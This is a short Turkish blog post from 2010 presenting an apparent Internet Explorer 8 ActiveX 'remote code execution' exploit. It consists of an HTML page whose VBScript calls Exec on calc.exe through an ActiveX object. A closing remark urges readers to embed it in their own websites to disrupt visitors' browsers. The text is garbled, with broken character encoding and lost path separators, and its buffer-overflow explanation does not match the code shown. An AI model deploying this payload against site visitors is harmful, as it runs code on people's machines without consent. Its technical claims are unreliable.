IE 8 ActiveX Remote Code Excution Açığı

Kategoriler: Benden / Yazılarım, Security, Vista, Windows 7, XP

 

Tarih: 19 Ocak 2010 | Yazar: Onur OKTAY

Risk: Yüksek
Etki: Activex denetimleri bozarak Explorer’ın tampon bellek taÅŸmasına neden olması
Etkilenenler: Internet Explorer 8 – OS: XP, Vista, Windows 7
Exploit (Code):

<html>
<p align=”left”><b><font face=”SegoeScript”
size=”7″>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&am
p;nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&am
p;nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</font></b></p>
<p>
<object classid=’clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8′ id=’target’
></object>
<script language=’vbscript’>

arg1=”c:WINDOWSsystem32calc.exe”

target.Exec arg1

</script></p>

Not: Yukarıdaki kodu direk olarak Web sitenizin bir bölümünde HTML olarak gömüp sayfanıza girip çıkanların ActiveX’ine eziyet çektirebilirsiniz. Internet Explorer 8 bir süre kasılıyor, tampon bellekte aktarım sorunlar yaşıyor ve çalışmaz hale geliyor.